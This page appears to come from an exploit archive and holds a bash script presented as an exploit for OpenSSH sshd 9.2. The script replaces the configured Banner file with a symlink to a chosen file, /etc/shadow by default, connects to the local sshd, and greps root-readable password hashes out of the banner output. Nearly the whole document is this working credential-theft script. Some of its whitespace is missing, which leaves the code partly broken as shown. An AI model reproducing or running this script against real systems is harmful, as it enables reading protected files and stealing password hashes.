Home OpenSSH sshd 9.2 symlink under banner exploit
Page
OpenSSH sshd 9.2 symlink under banner exploit
#!/bin/bash# By: oxagast## woahisread# this exploit depends on "Banner" being pointed at a file that# exists in a dir writeable by the user running the exploit, and# that the file can be removed/moved by that user. Basically the# banner file should be checked for proper permissions, as being# owned by root and writeable only by root, and sshd fails to do# this. This allows you to create a symlink, and read the file# it points to as the user running the openssh process which is# normally, root.
useage(){echo"Usage:"echo" $0 -p 22 -s 127.0.0.1 -f /etc/shadow" 1>&2
}echo"[*] WoahIsRead sshd 9.2 banner symbolic link exploit"while getopts":s:p:f:" o;do
case"${o}"in
p)p=${OPTARG}((p == 1 || p == 65535))|| useage
;;
s)s=${OPTARG};;
f)f=${OPTARG};;
?)
useage
;;esacdone
shift$((OPTIND -1))if[[!$f]];then
f="/etc/shadow"fi
if[[!$p]];then
p="22"fi
if[[!$s]];then
s="127.0.0.1"fi
BPATH=$(grep-i"^Banner " /etc/ssh/sshd_config | cut-d' '-f 2)VER=$(sshd -V 2>&1 | cut-d','-f 1)OWN=$(stat-c"%U"$f)echo"[*] SSHD Version: $VER"echo"[*] SSHD Banner path is: $BPATH"echo"[*] SSHD Banner owner is: $OWN"if[[$BPATH=="none"]];then
echo"[x] SSHD Banner must be set to a user owned file"exit 1
fi
if test-e$BPATH;then
mv$BPATH$BPATH.bak
ln-s$f$BPATHMOV=1
else
ln-s$f$BPATHfi
echo"[*] SSHing to ourselves... $s:$p"
ssh -oBatchMode=true$s-p$p 2>&1 | tee /tmp/sshexp.1 >/dev/null
head-n-1 /tmp/sshexp.1 >out
if[[$f=="/etc/shadow"]];then
if[[$(head-n 1 out | grep root)]];then
grep':\$.\$' out
echo"[!] Exploit complete, cleaning up..."if[[$MOV-eq 1 ]];then
mv$BPATH.bak $BPATHfi
exit 0
else
echo"[x] Sorry, exploit failed."exit 1
fi
else
cat out
exit 0
fi